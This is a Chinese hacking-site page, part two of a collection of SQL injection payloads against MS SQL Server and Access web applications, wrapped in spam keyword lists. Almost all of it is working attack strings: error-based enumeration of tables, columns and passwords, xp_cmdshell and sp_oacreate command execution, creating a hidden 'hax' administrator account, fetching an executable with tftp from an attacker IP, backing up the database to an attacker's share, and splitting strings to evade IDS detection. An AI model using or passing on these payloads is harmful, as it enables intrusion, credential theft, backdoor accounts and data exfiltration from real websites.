久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品

合作QQ:25496334 TG@heimao_wiki
當(dāng)前位置:首頁 >> 網(wǎng)站漏洞 >> SQL注入 >> SQL注入語句 下

SQL注入語句 下

yupang SQL注入 727

sql注入語句 上 http://m.790079.com/2021/12/56162/


and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一個表 假設(shè)為 admin 
 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin
')) 來得到其他的表。
 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'and uid>(st
r(id))) 暴到 UID 的數(shù)值假設(shè)為 18779569 uid=id 
 and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一個 admin 的一個字
段,假設(shè)為 user_id 
 and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in('id
',...)) 來暴出其他的字段
 and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用戶名
 依次可以得到密碼。。。。。假設(shè)存在 user_id username ,password 等字段
 Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 
 Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin 
 (union 語句到處風(fēng)靡啊,access 也好用
暴庫特殊技巧::%5c='/' 或者把/和/ 修改%5 提交
 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 
 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名
 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address
')) 
 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(s
tr(id))) 判斷 id 值
 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段
http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--
http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1 
 ;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) e
xec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM/CurrentControlSet/Services/
W3SVC/Parameters/Virtual Roots/', @value_name='/', values=@test OUTPUT insert into paths(path) 
values(@test) 
http://61.131.96.39/PageShow.asp?TianName=政策法規(guī)&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E
08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp
_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--
 得到了 web 路徑 d:/xxxx,接下來:
http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--
傳統(tǒng)的存在 xp_cmdshell 的測試過程:
 ;exec master..xp_cmdshell 'dir' 
 ;exec master.dbo.sp_addlogin hax;--
 ;exec master.dbo.sp_password null,hax,hax;--
 ;exec master.dbo.sp_addsrvrolemember hax sysadmin;--
 ;exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes
 /passwordreq:yes /active:yes /add';--
 ;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--
 exec master..xp_servicecontrol 'start', 'schedule' 
 exec master..xp_servicecontrol 'start', 'server' 
 http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',
@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user swap 
5258 /add' 
 ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,
'run',null, 'C:/WINNT/system32/cmd.exe /c net localgroup administrators swap/add' 
http://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-
 declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/' 
 declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:/' 
 ;declare @a;set @a=db_name();backup database @a to disk='你的 IP 你的共享目錄 bak.dat' 
 如果被限制則可以。
 select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_add
login hax') 
 傳統(tǒng)查詢構(gòu)造:
 select * FROM news where id=... AND topic=... AND ..... 
 admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,0
1),1)='1') and userpass <>' 
 select 123;--
 ;use master;--
 :a' or name like 'fff%';-- 顯示有一個叫 ffff 的用戶哈。
 'and 1<>(select count(email) from [user]);--
 ;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) 
where name='ffff';--
說明:
 上面的語句是得到數(shù)據(jù)庫中的第一個用戶表,并把表名放在 ffff 用戶的郵箱字段中。
 通過查看 ffff 的用戶資料可得第一個用表叫 ad 
 然后根據(jù)表名 ad 得到這個表的 ID 
 ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='a
d') where name='ffff';--
 象下面這樣就可以得到第二個表的名字了
 ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>58
1577110) where name='ffff';--< 
BR> ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';
--
 ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff
';--
 ffff';update [users] set email=(select top 1 name from password where id=2) where name='fff
f';--
 exec master..xp_servicecontrol 'start', 'schedule' 
 exec master..xp_servicecontrol 'start', 'server' 
 sp_addextendedproc 'xp_webserver', 'c:/temp/xp_foo.dll' 
 擴(kuò)展存儲就可以通過一般的方法調(diào)用:
 exec xp_webserver 
 一旦這個擴(kuò)展存儲執(zhí)行過,可以這樣刪除它: 
 sp_dropextendedproc 'xp_webserver' 
 insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char
(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-
 insert into users values( 667,123,123,0xffff)-
 insert into users values ( 123, 'admin''--', 'password', 0xffff)-
 ;and user>0 
 ;;and (select count(*) from sysobjects)>0 
 ;;and (select count(*) from mysysobjects)>0 //為 access 數(shù)據(jù)庫
 -----------------------------------------------------------通常注射的一些介紹:
 A) ID=49 這類注入的參數(shù)是數(shù)字型,SQL 語句原貌大致如下:
 select * from 表名 where 字段=49 
 注入的參數(shù)為 ID=49 And [查詢條件],即是生成語句:
 select * from 表名 where 字段=49 And [查詢條件]
 (B) Class=連續(xù)劇 這類注入的參數(shù)是字符型,SQL 語句原貌大致概如下:
 select * from 表名 where 字段='連續(xù)劇' 
 注入的參數(shù)為 Class=連續(xù)劇' and [查詢條件] and ''=' ,即是生成語句:
 select * from 表名 where 字段='連續(xù)劇' and [查詢條件] and ''='' 
 (C) 搜索時沒過濾參數(shù)的,如 keyword=關(guān)鍵字,SQL 語句原貌大致如下:
 select * from 表名 where 字段 like '%關(guān)鍵字%' 
 注入的參數(shù)為 keyword=' and [查詢條件] and '%25'=', 即是生成語句:
 select * from 表名 where 字段 like '%' and [查詢條件] and '%'='%' 
 ;;and (select Top 1 name from sysobjects where xtype='U' and status>0)>0 
 sysobjects 是 SQLServer 的系統(tǒng)表,存儲著所有的表名、視圖、約束及其它對象,xtype='U' and status>0,
表示用戶建立的表名,上面的語句將第一個表名取出,與 0 比較大小,讓報錯信息把表名暴露出來。
 ;;and (select Top 1 col_name(object_id('表名'),1) from sysobjects)>0 
 從⑤拿到表名后,用 object_id('表名')獲取表名對應(yīng)的內(nèi)部 ID,col_name(表名 ID,1)代表該表的第 1 個字段
名,將 1 換成 2,3,4...就可以逐個獲取所猜解表里面的字段名。
 post.htm 內(nèi)容:主要是方便輸入。
 枚舉出他的數(shù)據(jù)表名:
 id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>
0);--
 這是將第一個表名更新到 aaa 的字段處。
 讀出第一個表,第二個表可以這樣讀出來(在條件后加上 and name<>'剛才得到的表名')。
 id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 
and name<>'vote');--
 然后 id=1552 and exists(select * from aaa where aaa>5) 
 讀出第二
表,^^^^^^一個個的讀出,直到?jīng)]有為止。
 讀字段是這樣:
 id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--
 然后 id=1552 and exists(select * from aaa where aaa>5)出錯,得到字段名
 id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--
 然后 id=1552 and exists(select * from aaa where aaa>5)出錯,得到字段名
 --------------------------------高級技巧:
 [獲得數(shù)據(jù)表名][將字段值更新為表名,再想法讀出這個字段的值就可得到表名]
  update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and nam
e<>'你得到的表名' 查出一個加一個]) [ where 條件] 
 select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','tabl
e2',…) 
 通過 SQLSERVER 注入漏洞建數(shù)據(jù)庫管理員帳號和系統(tǒng)管理員帳號[當(dāng)前帳號必須是 SYSADMIN 組] 
 [獲得數(shù)據(jù)表字段名][將字段值更新為字段名,再想法讀出這個字段的值就可得到字段名] 
 update 表名 set 字段=(select top 1 col_name(object_id('要查詢的數(shù)據(jù)表名'),字段列如:1) [ where 
條件] 
 繞過 IDS 的檢測[使用變量] 
 declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/' 
 declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:/' 
 1、 開啟遠(yuǎn)程數(shù)據(jù)庫
 基本語法
 select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * f
rom table1' ) 
 參數(shù): (1) OLEDB Provider name


協(xié)助本站SEO優(yōu)化一下,謝謝!
關(guān)鍵詞不能為空

免責(zé)聲明

資料匯總于網(wǎng)絡(luò),如有侵權(quán) 聯(lián)系站長刪除 http://m.790079.com

同類推薦

發(fā)表評論

訪客

◎歡迎參與討論,請?jiān)谶@里發(fā)表您的看法和觀點(diǎn)。
站點(diǎn)信息
標(biāo)簽列表
網(wǎng)站分類
友情鏈接
久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品
青青草一区二区| 粉嫩av免费一区二区三区| 久久综合电影一区| 久久久久免费精品| 国产精品99久久久久久久| 国产裸体舞一区二区三区| 黄色免费高清视频| 欧美中文在线免费| 日韩精品一区在线视频| 日日夜夜精品网站| 天天操天天干天天玩| 久久中文字幕在线视频| 欧美成人精品一区| 精品蜜桃一区二区三区 | 91精品久久久久久久久久久久久久 | 欧美日本国产精品| 日本午夜在线亚洲.国产| 天堂资源在线亚洲视频| 欧美一级片在线播放| 日本一区二区黄色| 人人爽久久涩噜噜噜网站| 日韩国产精品一区二区三区| 人妻无码一区二区三区四区| 欧美综合一区第一页| 免费在线观看亚洲视频| 国严精品久久久久久亚洲影视| 免费精品视频一区二区三区| 国产亚洲第一区| 高清亚洲成在人网站天堂| 国产资源第一页| 国产麻豆日韩| 国产精品69久久| www.欧美免费| 国产精品电影网| 一区二区精品国产| 日韩av一级大片| 毛葺葺老太做受视频| 国产九色91| 久久久中文字幕| 国产精品日韩电影| 亚洲一区高清| 欧美性视频在线播放| 国产免费观看久久黄| 久久免费精品日本久久中文字幕| 国产a一区二区| 国产精品免费成人| 久久久久久国产精品美女| 丁香色欲久久久久久综合网| 人妻夜夜添夜夜无码av| 国产乱人伦精品一区二区三区| 国产精品10p综合二区| 国产精品旅馆在线| 午夜肉伦伦影院| 欧美v在线观看| 91精品中国老女人| 国产精品久久久久久久久久尿| 亚洲a∨一区二区三区| 欧美一区二区在线| 国产精品一区二区免费在线观看| 国产高清www| 久热精品在线视频| 欧美中文字幕在线播放| 97碰在线视频| 欧美成人精品三级在线观看| 日韩精品久久一区| 91久久精品视频| 国产精品国产福利国产秒拍| 日本一区免费在线观看| 俄罗斯精品一区二区三区| 久久久精品电影| 手机看片福利永久国产日韩| 国产亚洲综合视频| 久久国产一区二区三区| 亚洲天堂第一区| 欧美视频1区| 久久久久久草| 中文字幕一区二区三区有限公司| 欧美 国产 日本| 久久99影院| 亚洲7777| 国产美女久久久| 国产精品久久九九| 日韩欧美在线播放视频| av中文字幕av| 欧美日本精品在线| 欧美一区二三区| 国产a级一级片| 亚洲乱码一区二区三区| 国产伦精品一区二区三区高清版 | 91精品视频免费观看| 精品乱色一区二区中文字幕| 欧美日本韩国国产| 日韩在线观看精品| 青草视频在线观看视频| 国产mv免费观看入口亚洲| 亚洲精品视频一区二区三区| 黄色一级二级三级| www.日韩视频| 热久久免费视频精品| 久久99久久精品国产| 少妇大叫太大太粗太爽了a片小说| av电影一区二区三区| 色综合久久88| 性欧美激情精品| 91av在线不卡| 欧美一级视频在线播放| 久久这里只有精品18| 日日摸天天爽天天爽视频| 国产精品69精品一区二区三区| 亚洲精品国产一区| 国产精品9999久久久久仙踪林| 亚洲精品女av网站| 成人中文字幕在线播放| 一区二区在线观| 99在线观看| 性高湖久久久久久久久aaaaa| 国产精品99久久久久久www| 日日噜噜噜夜夜爽爽| 久久久久综合一区二区三区| 日韩免费高清在线| 国产精品露出视频| 国产男女免费视频| 天天干天天色天天爽| 久久久国产视频91| 国产乱子伦精品无码专区| 日韩在线第一区| 日韩在线精品视频| 今天免费高清在线观看国语| 国产99久久久欧美黑人| 久久精品视频91| 精品无码久久久久久久动漫| 亚洲精蜜桃久在线| 国产精品网站大全| 97久久精品视频| 欧美性视频精品| 亚洲午夜精品福利| 国产成人精品午夜| 国产精品夜间视频香蕉| 日本精品一区二区三区在线 | 亚洲自拍av在线| 国产日韩欧美精品在线观看| 久久九九免费视频| 国产欧美高清在线| 一本色道久久综合亚洲二区三区| 成人精品视频在线播放| 亚洲一区在线免费| 国产精品678| 国模视频一区二区| 欧美激情国产精品| 91免费看片在线| 欧美一级淫片播放口| 国产精品推荐精品| 91国产美女在线观看| 日韩欧美亚洲日产国产| 久久精品视频99| 精品一区二区三区自拍图片区| 中文字幕日韩一区二区三区不卡 | 国产一区二区香蕉| 在线观看一区二区三区三州| 91精品国产高清久久久久久91 | 国产乱子伦精品| 天天成人综合网| 日韩专区中文字幕| 国产欧美韩日| 日韩国产精品一区二区三区| 久久综合久久八八| 色妞欧美日韩在线| 国产精品亚洲自拍| 91久久精品国产| 国产日韩综合一区二区性色av| 少妇精品久久久久久久久久| 国产精品国产三级国产专区51 | 丰满少妇大力进入| 日本国产高清不卡| 免费av一区二区| 成人国产精品色哟哟| 免费看污污视频| 日本不卡在线观看视频| 欧美激情精品久久久久久变态| 国产成人av网址| 古典武侠综合av第一页| 国产一区二区不卡视频| 日本欧美国产在线| 一本一本a久久| 国产精品久久久久av免费| 成人黄动漫网站免费| 国产深夜精品福利| 热门国产精品亚洲第一区在线 | 蜜桃成人免费视频| 婷婷精品国产一区二区三区日韩 | 久久免费在线观看| 国产一区玩具在线观看| 欧美亚洲一级片| 日韩人妻精品一区二区三区| 一区二区日本伦理| 久久riav| 国产mv免费观看入口亚洲| 99热亚洲精品| www.com毛片| 成人福利视频网|